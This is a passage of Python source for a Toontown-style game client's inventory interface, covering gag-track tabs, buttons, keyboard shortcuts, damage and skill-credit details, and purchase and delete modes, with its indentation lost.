NoncreditPressableImageColor = Vec4(0.3, 0.6, 0.6, 1)
PropBonusNoncreditPressableImageColor = Vec4(0.6, 0.6, 0.3, 1)
DeletePressableImageColor = Vec4(0.7, 0.1, 0.1, 1)
UnpressableTextColor = Vec4(1, 1, 1, 0.3)
UnpressableGeomColor = Vec4(1, 1, 1, 0.3)
UnpressableImageColor = Vec4(0.3, 0.3, 0.3, 0.8)
BookUnpressableTextColor = Vec4(1, 1, 1, 1)
BookUnpressableGeomColor = Vec4(1, 1, 1, 1)
BookUnpressableImage0Color = Vec4(0, 0.6, 1, 1)
BookUnpressableImage2Color = Vec4(0.1, 0.7, 1, 1)
ShadowColor = Vec4(0, 0, 0, 0)
ShadowBuffedColor = Vec4(1, 1, 1, 1)
UnpressableShadowBuffedColor = Vec4(1, 1, 1, 0.3)
TrackYOffset = 0.0
TrackYSpacing = -0.12
ButtonXOffset = -0.31
ButtonXSpacing = 0.18
def __init__(self, toon, invStr = None, ShowSuperGags = 1):
InventoryBase.InventoryBase.__init__(self, toon, invStr)
DirectFrame.__init__(self, relief=None)
self.initialiseoptions(InventoryNewNEW)
self.battleCreditLevel = None
self.detailCredit = None
self.__battleCreditMultiplier = 1
self.__invasionCreditMultiplier = 1
self.__respectInvasions = 1
self._interactivePropTrackBonus = -1
self.tutorialFlag = 0
self.gagTutMode = 0
self.showSuperGags = ShowSuperGags
self.clickSuperGags = 1
self.activeTab = 4
self.propAndOrganicBonusStack = config.GetBool('prop-and-organic-bonus-stack', 0)
self.propBonusIval = Parallel()
self.activateMode = 'book'
self.load()
self.hide()
return
def setBattleCreditMultiplier(self, mult):
self.__battleCreditMultiplier = mult
def getBattleCreditMultiplier(self):
return self.__battleCreditMultiplier
def setInteractivePropTrackBonus(self, trackBonus):
self._interactivePropTrackBonus = trackBonus
def getInteractivePropTrackBonus(self):
return self._interactivePropTrackBonus
def setInvasionCreditMultiplier(self, mult):
self.__invasionCreditMultiplier = mult
def getInvasionCreditMultiplier(self):
return self.__invasionCreditMultiplier
def setRespectInvasions(self, flag):
self.__respectInvasions = flag
def getRespectInvasions(self):
return self.__respectInvasions
def show(self):
if self.tutorialFlag:
self.tutArrows.arrowsOn(-0.4, -0.62, 90, -0.4, -0.62, 90, onTime=1.0, offTime=0.2)
if self.numItem(THROW_TRACK, 0) == 0:
self.tutArrows.arrow1.reparentTo(hidden)
else:
self.tutArrows.arrow1.reparentTo(self.battleFrame, 1)
if self.numItem(SQUIRT_TRACK, 0) == 0:
self.tutArrows.arrow2.reparentTo(hidden)
else:
self.tutArrows.arrow2.reparentTo(self.battleFrame, 1)
self.tutText.show()
self.tutText.reparentTo(self.battleFrame, 1)
DirectFrame.show(self)
def uberGagToggle(self, showSuperGags = 1):
self.showSuperGags = showSuperGags
for itemList in self.invModels:
for itemIndex in range(MAX_LEVEL_INDEX + 1):
if itemIndex <= LAST_REGULAR_GAG_LEVEL + 1 or self.showSuperGags:
itemList[itemIndex].show()
else:
itemList[itemIndex].hide()
for buttonList in self.buttons:
for buttonIndex in range(MAX_LEVEL_INDEX + 1):
if buttonIndex <= LAST_REGULAR_GAG_LEVEL or self.showSuperGags:
buttonList[buttonIndex].show()
else:
buttonList[buttonIndex].hide()
def enableUberGags(self, enableSG = -1):
if enableSG != -1:
self.clickSuperGags = enableSG
for buttonList in self.buttons:
for buttonIndex in range(LAST_REGULAR_GAG_LEVEL + 1, MAX_LEVEL_INDEX + 1):
if self.clickSuperGags:
pass
else:
self.makeUnpressable(buttonList[buttonIndex], self.buttons.index(buttonList), buttonIndex)
def hide(self):
if self.tutorialFlag:
self.tutArrows.arrowsOff()
self.tutText.hide()
DirectFrame.hide(self)
def updateTotalPropsText(self):
textTotal = TTLocalizer.InventoryTotalGags % (self.totalProps, self.toon.getMaxCarry())
if localAvatar.getPinkSlips() > 1:
textTotal = textTotal + '\n\n' + TTLocalizer.InventroyPinkSlips % localAvatar.getPinkSlips()
elif localAvatar.getPinkSlips() == 1:
textTotal = textTotal + '\n\n' + TTLocalizer.InventroyPinkSlip
self.totalLabel['text'] = textTotal
def unload(self):
self.notify.debug('Unloading Inventory for %d' % self.toon.doId)
self.stopAndClearPropBonusIval()
self.propBonusIval.finish()
self.propBonusIval = None
del self.invModels
self.buttonModels.removeNode()
del self.buttonModels
del self.upButton
del self.downButton
del self.rolloverButton
del self.flatButton
del self.invFrame
del self.levelsButton
del self.battleFrame
del self.purchaseFrame
del self.storePurchaseFrame
self.deleteAllButton.destroy()
del self.deleteAllButton
self.deleteEnterButton.destroy()
del self.deleteEnterButton
self.deleteExitButton.destroy()
del self.deleteExitButton
del self.detailFrame
del self.detailNameLabel
del self.detailAmountLabel
del self.detailDataLabel
del self.totalLabel
del self.activeTab
self.cleanupDialog()
for row in self.trackRows:
row.destroy()
del self.trackRows
del self.trackNameLabels
del self.trackBars
for buttonList in self.buttons:
for buttonIndex in range(MAX_LEVEL_INDEX + 1):
buttonList[buttonIndex].destroy()
del self.buttons
InventoryBase.InventoryBase.unload(self)
DirectFrame.destroy(self)
return
def cleanupDialog(self):
if self.dialog:
self.dialog.cleanup()
self.dialog = None
def load(self):
self.notify.debug('Loading Inventory for %d' % self.toon.doId)
invModel = loader.loadModel('phase_3.5/models/gui/inventory_icons')
self.invModels = []
offset = 0.0
for track in range(len(AvPropsNew)):
itemList = []
for item in range(len(AvPropsNew[track])):
itemList.append(invModel.find('**/' + AvPropsNew[track][item]))
self.invModels.append(itemList)
invModel.removeNode()
del invModel
self.buttonModels = loader.loadModel('phase_3.5/models/gui/inventory_gui')
self.battleGui = loader.loadModel('phase_3.5/models/gui/battle_gui_new')
self.healRow = self.battleGui.find('**/healBar')
self.trapRow = self.battleGui.find('**/trapBar')
self.lureRow = self.battleGui.find('**/lureBar')
self.soundRow = self.battleGui.find('**/soundBar')
self.throwRow = self.battleGui.find('**/throwBar')
self.squirtRow = self.battleGui.find('**/squirtBar')
self.zapRow = self.battleGui.find('**/zapBar')
self.dropRow = self.battleGui.find('**/dropBar')
bars = [self.healRow, self.trapRow, self.lureRow, self.soundRow, self.throwRow, self.squirtRow, self.zapRow, self.dropRow]
self.battleCircle = self.battleGui.find('**/battleCircle')
self.tab = self.battleGui.find('**/whiteTab')
self.rowModel = self.buttonModels.find('**/InventoryRow')
self.upButton = self.buttonModels.find('**/InventoryButtonUp')
self.downButton = self.buttonModels.find('**/InventoryButtonDown')
self.rolloverButton = self.buttonModels.find('**/InventoryButtonRollover')
self.flatButton = self.buttonModels.find('**/InventoryButtonFlat')
self.invFrame = DirectFrame(relief=None, parent=self)
self.levelsButton = None
self.battleFrame = None
self.purchaseFrame = None
self.storePurchaseFrame = None
trashcanGui = loader.loadModel('phase_3/models/gui/trashcan_gui')
self.deleteEnterButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDelete, TTLocalizer.InventoryDelete), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-1, 0, -0.35), scale=1.0)
self.deleteAllButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDeleteAll, TTLocalizer.InventoryDeleteAll), text_fg=(1, 0, 0, 1), text_shadow=(1, 1, 1, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-0.3, 0, -0.91), scale=0.75, command=self.__zeroInvConfirm)
self.deleteExitButton = DirectButton(parent=self.invFrame, image=(trashcanGui.find('**/TrashCan_OPEN'), trashcanGui.find('**/TrashCan_CLSD'), trashcanGui.find('**/TrashCan_RLVR')), text=('', TTLocalizer.InventoryDone, TTLocalizer.InventoryDone), text_fg=(1, 1, 1, 1), text_shadow=(0, 0, 0, 1), text_scale=0.1, text_pos=(0, -0.1), text_font=getInterfaceFont(), textMayChange=0, relief=None, pos=(-1, 0, -0.35), scale=1.0)
trashcanGui.removeNode()
self.deleteHelpText = DirectLabel(parent=self.invFrame, relief=None, pos=(0.272, 0.3, -0.907), text=TTLocalizer.InventoryDeleteHelp, text_fg=(0, 0, 0, 1), text_scale=0.08, textMayChange=0)
self.deleteHelpText.hide()
self.detailFrame = DirectFrame(parent=self.invFrame, relief=None, pos=(1.05, 0, -0.08))
self.circleFrame = DirectFrame(parent=self.detailFrame, relief=None, image=self.battleCircle, image_scale=0.25, pos=(0, 0, -0.25))
self.detailNameLabel = DirectLabel(parent=self.circleFrame, text='', text_scale=TTLocalizer.INdetailNameLabel, text_fg=(0.05, 0.14, 0.4, 1), scale=0.045, pos=(0, 0, 0.1), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None, image=self.invModels[0][0])
self.detailAmountLabel = DirectLabel(parent=self.circleFrame, text='', text_fg=(0.05, 0.14, 0.4, 1), scale=0.04, pos=(0, 0, -0.07), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailDataLabel = DirectLabel(parent=self.circleFrame, text='', text_fg=(0.05, 0.14, 0.4, 1), scale=0.03, pos=(0, 0, -0.1), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailCreditLabel = DirectLabel(parent=self.circleFrame, text=TTLocalizer.InventorySkillCreditNone, text_fg=(0.05, -0.14, -0.2, 1), scale=0.04, pos=(0, 0, 0.05), text_font=getInterfaceFont(), text_align=TextNode.ACenter, relief=None)
self.detailCreditLabel.hide()
self.totalLabel = DirectLabel(text='', parent=self.circleFrame, pos=(0, 0, 0.02), scale=0.05, text_fg=(0.05, 0.14, 0.4, 1), text_font=getInterfaceFont(), relief=None)
self.dialog = None
self.updateTotalPropsText()
self.trackRows = []
self.trackTabs = []
self.trackNameLabels = []
self.trackBars = []
self.buttons = []
for track in range(0, len(Tracks)):
trackTab = DirectButton(parent=self.invFrame, text=TextEncoder.upper(Tracks[track]), relief=None, scale=(0.5, 0.5, 0.5), pos=(-0.7 + offset, 0, -0.54), geom=self.tab, geom_color=(TrackColors[track][0] * 0.6,
TrackColors[track][1] * 0.6,
TrackColors[track][2] * 0.6,
1), text_font=ToontownGlobals.getInterfaceFont(), text_scale=TTLocalizer.INtrackNameLabels, text_pos=(0,0,0), text_align=TextNode.ACenter, command=self.doTab, extraArgs=[track], pressEffect=1)
offset += 0.2
trackFrame = DirectFrame(parent=self.invFrame, image=bars[track], scale=(1.0, 1.0, 1.0), pos=(0, 0, -0.7), state=DGG.NORMAL, relief=None)
trackFrame.bind(DGG.WITHIN, self.enterTrackFrame, extraArgs=[track])
trackFrame.bind(DGG.WITHOUT, self.exitTrackFrame, extraArgs=[track])
self.trackRows.append(trackFrame)
self.trackTabs.append(trackTab)
adjustLeft = -0.065
self.trackNameLabels.append(DirectLabel(text=TextEncoder.upper(Tracks[track]), parent=self.trackRows[track], pos=(-0.72 + adjustLeft, -0.1, 0.01), scale=TTLocalizer.INtrackNameLabels, relief=None, text_fg=(0.2, 0.2, 0.2, 1), text_font=getInterfaceFont(), text_align=TextNode.ALeft, textMayChange=0))
self.trackBars.append(DirectWaitBar(parent=self.trackRows[track], pos=(-0.58 + adjustLeft, -0.1, -0.025), relief=DGG.SUNKEN, frameSize=(-0.6,
0.6,
-0.1,
0.1), borderWidth=(0.02, 0.02), scale=0.25, frameColor=(TrackColors[track][0] * 0.6,
TrackColors[track][1] * 0.6,
TrackColors[track][2] * 0.6,
1), barColor=(TrackColors[track][0] * 0.9,
TrackColors[track][1] * 0.9,
TrackColors[track][2] * 0.9,
1), text='0 / 0', text_scale=0.16, text_fg=(0, 0, 0, 0.8), text_align=TextNode.ACenter, text_pos=(0, -0.05)))
self.buttons.append([])
for item in range(0, len(Levels[track])):
button = DirectButton(parent=self.trackRows[track], image=(self.upButton,
self.downButton,
self.rolloverButton,
self.flatButton), geom=self.invModels[track][item], text='50', text_scale=0.04, text_align=TextNode.ARight, geom_scale=0.7, geom_pos=(-0.01, -0.1, 0), text_fg=Vec4(1, 1, 1, 1), text_pos=(0.07, -0.04), textMayChange=1, relief=None, image_color=(0, 0.6, 1, 1), pos=(self.ButtonXOffset + item * self.ButtonXSpacing + adjustLeft, -0.1, 0), command=self.__handleSelection, extraArgs=[track, item])
button.bind(DGG.ENTER, self.showDetail, extraArgs=[track, item])
button.bind(DGG.EXIT, self.hideDetail)
self.buttons[track].append(button)
for x in xrange(0, len(self.trackRows)):
self.hideTrack(x)
self.trackRows[x].setBin("gui-popup", 50)
for x in xrange(0, len(self.trackTabs)):
self.trackTabs[x].hide()
for x in xrange(0, len(self.trackTabs)):
if self.toon.hasTrackAccess(x):
self.trackTabs[x].show()
self.doTab(self.activeTab)
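# Keyboard shortcuts: alt-1 through alt-8 switch between the eight gag-track
# tabs; doTab() below additionally binds control-1 through control-7 to pick
# a gag level on the currently active track.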
self.accept("alt-1", self.doTab, extraArgs=[0])
self.accept("alt-2", self.doTab, extraArgs=[1])
self.accept("alt-3", self.doTab, extraArgs=[2])
self.accept("alt-4", self.doTab, extraArgs=[3])
self.accept("alt-5", self.doTab, extraArgs=[4])
self.accept("alt-6", self.doTab, extraArgs=[5])
self.accept("alt-7", self.doTab, extraArgs=[6])
self.accept("alt-8", self.doTab, extraArgs=[7])
return
def doTab(self, index):
trackAccess = base.localAvatar.getTrackAccess()
if trackAccess[index] == 0:
return
self.activeTab = index
for track in xrange(len(self.trackRows)):
self.hideTrack(track)
self.trackTabs[track]['geom_color']= Vec4(TrackColors[track][0] * 0.6, TrackColors[track][1] * 0.6, TrackColors[track][2] * 0.6, 1)
self.trackTabs[index]['geom_color']= Vec4(TrackColors[index][0], TrackColors[index][1], TrackColors[index][2], 1)
self.showTrack(index)
for track in range(0, len(Tracks)):
for level in xrange(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
else:
button.hide()
self.accept("control-1", self.__handleSelection, extraArgs=[self.activeTab, 0, True])
self.accept("control-2", self.__handleSelection, extraArgs=[self.activeTab, 1, True])
self.accept("control-3", self.__handleSelection, extraArgs=[self.activeTab, 2, True])
self.accept("control-4", self.__handleSelection, extraArgs=[self.activeTab, 3, True])
self.accept("control-5", self.__handleSelection, extraArgs=[self.activeTab, 4, True])
self.accept("control-6", self.__handleSelection, extraArgs=[self.activeTab, 5, True])
self.accept("control-7", self.__handleSelection, extraArgs=[self.activeTab, 6, True])
def __handleSelection(self, track, level, viaKeyboard=False):
if self.activateMode == 'purchaseDelete' or self.activateMode == 'bookDelete' or self.activateMode == 'storePurchaseDelete':
if self.numItem(track, level):
self.useItem(track, level)
self.updateGUI(track, level)
messenger.send('inventory-deletion', [track, level])
self.showDetail(track, level)
elif self.activateMode == 'purchase' or self.activateMode == 'storePurchase':
messenger.send('inventory-selection', [track, level, viaKeyboard])
self.showDetail(track, level)
elif self.gagTutMode:
pass
else:
messenger.send('inventory-selection', [track, level, viaKeyboard])
def __handleRun(self):
messenger.send('inventory-run')
def __handleFire(self):
messenger.send('inventory-fire')
def __handleSOS(self):
messenger.send('inventory-sos')
def __handlePass(self):
messenger.send('inventory-pass')
def __handleLevels(self):
if settings.get('show-cog-levels', True):
settings['show-cog-levels'] = False
self.levelsButton['text'] = TTLocalizer.InventoryLevelsShow
else:
settings['show-cog-levels'] = True
self.levelsButton['text'] = TTLocalizer.InventoryLevelsHide
messenger.send('inventory-levels')
def __handleBackToPlayground(self):
messenger.send('inventory-back-to-playground')
def __zeroInvConfirm(self):
self.cleanupDialog()
self.dialog = TTDialog.TTDialog(style=TTDialog.YesNo, text=TTLocalizer.InventoryDeleteConfirm, command=self.__zeroInvAndUpdate)
self.dialog.show()
def __zeroInvAndUpdate(self, value):
self.cleanupDialog()
if value > 0:
self.zeroInv()
self.updateGUI()
def showDetail(self, track, level, event = None):
self.totalLabel.hide()
self.detailNameLabel.show()
self.detailNameLabel.configure(text=AvPropStrings[track][level], image_image=self.invModels[track][level])
self.detailNameLabel.configure(image_scale=20, image_pos=(-0.2, 0, -2.2))
self.detailAmountLabel.show()
self.detailAmountLabel.configure(text=TTLocalizer.InventoryDetailAmount % {'numItems': self.numItem(track, level),
'maxItems': self.getMax(track, level)})
self.detailDataLabel.show()
damage = getAvPropDamage(track, level, self.toon.experience.getExp(track))
organicBonus = self.toon.checkGagBonus(track, level)
propBonus = self.checkPropBonus(track)
damageBonusStr = ''
damageBonus = 0
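# When prop and organic bonuses are allowed to stack, each applicable bonus
# adds getDamageBonus(damage) once (so both together add it twice); otherwise
# having either bonus adds it a single time.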
if self.propAndOrganicBonusStack:
if propBonus:
damageBonus += getDamageBonus(damage)
if organicBonus:
damageBonus += getDamageBonus(damage)
if damageBonus:
damageBonusStr = TTLocalizer.InventoryDamageBonus % damageBonus
else:
if propBonus or organicBonus:
damageBonus += getDamageBonus(damage)
if damageBonus:
damageBonusStr = TTLocalizer.InventoryDamageBonus % damageBonus
accString = AvTrackAccStrings[track]
if (organicBonus or propBonus) and track == LURE_TRACK:
accString = TTLocalizer.BattleGlobalLureAccMedium
self.detailDataLabel.configure(text=TTLocalizer.InventoryDetailData % {'accuracy': accString,
'damageString': self.getToonupDmgStr(track, level),
'damage': damage,
'bonus': damageBonusStr,
'singleOrGroup': self.getSingleGroupStr(track, level)})
if self.itemIsCredit(track, level):
mult = self.__battleCreditMultiplier
if self.__respectInvasions:
mult *= self.__invasionCreditMultiplier
self.setDetailCredit(track, (level + 1) * mult)
else:
self.setDetailCredit(track, None)
self.detailCreditLabel.show()
return
def setDetailCredit(self, track, credit):
if credit != None:
if self.toon.earnedExperience:
maxCredit = ExperienceCap - self.toon.earnedExperience[track]
credit = min(credit, maxCredit)
credit = int(credit * 10 + 0.5)
if credit % 10 == 0:
credit /= 10
else:
credit /= 10.0
if self.detailCredit == credit:
return
if credit != None:
self.detailCreditLabel['text'] = TTLocalizer.InventorySkillCredit % credit
if self.detailCredit == None:
self.detailCreditLabel['text_fg'] = (0.05, 0.14, 0.4, 1)
else:
self.detailCreditLabel['text'] = TTLocalizer.InventorySkillCreditNone
self.detailCreditLabel['text_fg'] = (0.5, 0.0, 0.0, 1.0)
self.detailCredit = credit
return
def hideDetail(self, event = None):
self.totalLabel.show()
self.detailNameLabel.hide()
self.detailAmountLabel.hide()
self.detailDataLabel.hide()
self.detailCreditLabel.hide()
def noDetail(self):
self.totalLabel.hide()
self.detailNameLabel.hide()
self.detailAmountLabel.hide()
self.detailDataLabel.hide()
self.detailCreditLabel.hide()
def setActivateMode(self, mode, heal = 1, trap = 1, lure = 1, bldg = 0, creditLevel = None, tutorialFlag = 0, gagTutMode = 0):
self.notify.debug('setActivateMode() mode:%s heal:%s trap:%s lure:%s bldg:%s' % (mode,
heal,
trap,
lure,
bldg))
self.previousActivateMode = self.activateMode
self.activateMode = mode
self.deactivateButtons()
self.heal = heal
self.trap = trap
self.lure = lure
self.bldg = bldg
self.battleCreditLevel = creditLevel
self.tutorialFlag = tutorialFlag
self.gagTutMode = gagTutMode
self.__activateButtons()
self.enableUberGags()
return None
def setActivateModeBroke(self):
if self.activateMode == 'storePurchase':
self.setActivateMode('storePurchaseBroke')
elif self.activateMode == 'purchase':
self.setActivateMode('purchaseBroke', gagTutMode=self.gagTutMode)
else:
self.notify.error('Unexpected mode in setActivateModeBroke(): %s' % self.activateMode)
self.enableUberGags()
def deactivateButtons(self):
self.cleanupDialog()
if self.previousActivateMode == 'book':
self.bookDeactivateButtons()
elif self.previousActivateMode == 'bookDelete':
self.bookDeleteDeactivateButtons()
elif self.previousActivateMode == 'purchaseDelete':
self.purchaseDeleteDeactivateButtons()
elif self.previousActivateMode == 'purchase':
self.purchaseDeactivateButtons()
elif self.previousActivateMode == 'purchaseBroke':
self.purchaseBrokeDeactivateButtons()
elif self.previousActivateMode == 'gagTutDisabled':
self.gagTutDisabledDeactivateButtons()
elif self.previousActivateMode == 'battle':
self.battleDeactivateButtons()
elif self.previousActivateMode == 'storePurchaseDelete':
self.storePurchaseDeleteDeactivateButtons()
elif self.previousActivateMode == 'storePurchase':
self.storePurchaseDeactivateButtons()
elif self.previousActivateMode == 'storePurchaseBroke':
self.storePurchaseBrokeDeactivateButtons()
elif self.previousActivateMode == 'plantTree':
self.plantTreeDeactivateButtons()
else:
self.notify.error('No such mode as %s' % self.previousActivateMode)
return None
def __activateButtons(self):
self.cleanupDialog()
if hasattr(self, 'activateMode'):
if self.activateMode == 'book':
self.bookActivateButtons()
elif self.activateMode == 'bookDelete':
self.bookDeleteActivateButtons()
elif self.activateMode == 'purchaseDelete':
self.purchaseDeleteActivateButtons()
elif self.activateMode == 'purchase':
self.purchaseActivateButtons()
elif self.activateMode == 'purchaseBroke':
self.purchaseBrokeActivateButtons()
elif self.activateMode == 'gagTutDisabled':
self.gagTutDisabledActivateButtons()
elif self.activateMode == 'battle':
self.battleActivateButtons()
elif self.activateMode == 'storePurchaseDelete':
self.storePurchaseDeleteActivateButtons()
elif self.activateMode == 'storePurchase':
self.storePurchaseActivateButtons()
elif self.activateMode == 'storePurchaseBroke':
self.storePurchaseBrokeActivateButtons()
elif self.activateMode == 'plantTree':
self.plantTreeActivateButtons()
else:
self.notify.error('No such mode as %s' % self.activateMode)
self.doTab(self.activeTab)
return None
def bookActivateButtons(self):
self.setPos(0, 0, 0.52)
self.setScale(1.0)
self.detailFrame.setPos(0.1, 0, -0.855)
self.detailFrame.setScale(0.75)
self.deleteEnterButton.hide()
self.deleteAllButton.hide()
self.deleteExitButton.hide()
self.invFrame.reparentTo(self)
self.invFrame.setPos(0, 0, 0)
self.invFrame.setScale(1)
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
self.makeBookUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return None
def bookDeactivateButtons(self):
self.deleteEnterButton['command'] = None
return
def bookDeleteActivateButtons(self):
messenger.send('enterBookDelete')
self.setPos(-0.2, 0, 0.4)
self.setScale(0.8)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(1.029, 0, -0.639)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(1.029, 0, -0.639)
self.deleteExitButton.setScale(0.75)
self.deleteHelpText.show()
self.invFrame.reparentTo(self)
self.invFrame.setPos(0, 0, 0)
self.invFrame.setScale(1)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
def bookDeleteDeactivateButtons(self):
messenger.send('exitBookDelete')
self.deleteHelpText.hide()
self.deleteDeactivateButtons()
def purchaseDeleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseDeleteDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
self.deleteDeactivateButtons()
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
def storePurchaseDeleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
self.deleteEnterButton.hide()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.show()
self.deleteExitButton.setPos(-0.55, 0, -0.91)
self.deleteExitButton.setScale(0.75)
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0 or level >= UBER_GAG_LEVEL_INDEX:
self.makeUnpressable(button, track, level)
else:
self.makeDeletePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseDeleteDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
self.deleteDeactivateButtons()
def storePurchaseBrokeActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.storePurchaseFrame == None:
self.loadStorePurchaseFrame()
self.storePurchaseFrame.show()
self.invFrame.reparentTo(self.storePurchaseFrame)
self.invFrame.setPos(-0.23, 0, 0.505)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.175, 0, 0)
self.detailFrame.setScale(1.25)
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.55, 0, -0.91)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.551, 0, -0.91)
self.deleteExitButton.setScale(0.75)
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
self.makeUnpressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def storePurchaseBrokeDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.storePurchaseFrame.hide()
def deleteActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0, 0, 0)
self.setScale(1)
self.deleteEnterButton.hide()
self.deleteExitButton.show()
self.deleteExitButton['command'] = self.setActivateMode
self.deleteExitButton['extraArgs'] = [self.previousActivateMode]
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
if self.numItem(track, level) <= 0:
self.makeUnpressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return None
def deleteDeactivateButtons(self):
self.deleteExitButton['command'] = None
return
def purchaseActivateButtons(self):
self.reparentTo(aspect2d)
self.setPos(0.2, 0, -0.04)
self.setScale(1)
if self.purchaseFrame == None:
self.loadPurchaseFrame()
self.purchaseFrame.show()
self.invFrame.reparentTo(self.purchaseFrame)
self.invFrame.setPos(-0.235, 0, 0.52)
self.invFrame.setScale(0.81)
self.detailFrame.setPos(1.17, 0, -0.02)
self.detailFrame.setScale(1.25)
totalProps = self.totalProps
maxProps = self.toon.getMaxCarry()
self.deleteAllButton.show()
self.deleteEnterButton.show()
self.deleteEnterButton.setPos(-0.441, 0, -0.917)
self.deleteEnterButton.setScale(0.75)
self.deleteExitButton.hide()
self.deleteExitButton.setPos(-0.441, 0, -0.917)
self.deleteExitButton.setScale(0.75)
if self.gagTutMode:
self.deleteAllButton.hide()
self.deleteEnterButton.hide()
self.deleteEnterButton['command'] = self.setActivateMode
self.deleteEnterButton['extraArgs'] = ['purchaseDelete']
for track in range(len(Tracks)):
if self.toon.hasTrackAccess(track):
self.showTrack(track)
for level in range(len(Levels[track])):
button = self.buttons[track][level]
if self.itemIsUsable(track, level):
button.show()
unpaid = not base.cr.isPaid()
if self.numItem(track, level) >= self.getMax(track, level) or totalProps == maxProps or unpaid and gagIsPaidOnly(track, level) or level > LAST_REGULAR_GAG_LEVEL:
if gagIsPaidOnly(track, level):
self.makeDisabledPressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makeUnpressable(button, track, level)
elif unpaid and gagIsVelvetRoped(track, level):
self.makeDisabledPressable(button, track, level)
else:
self.makePressable(button, track, level)
else:
button.hide()
else:
self.hideTrack(track)
return
def purchaseDeactivateButtons(self):
self.invFrame.reparentTo(self)
self.purchaseFrame.hide()
def storePurchaseActivateButtons(self):
self.reparentTo(aspect2d)
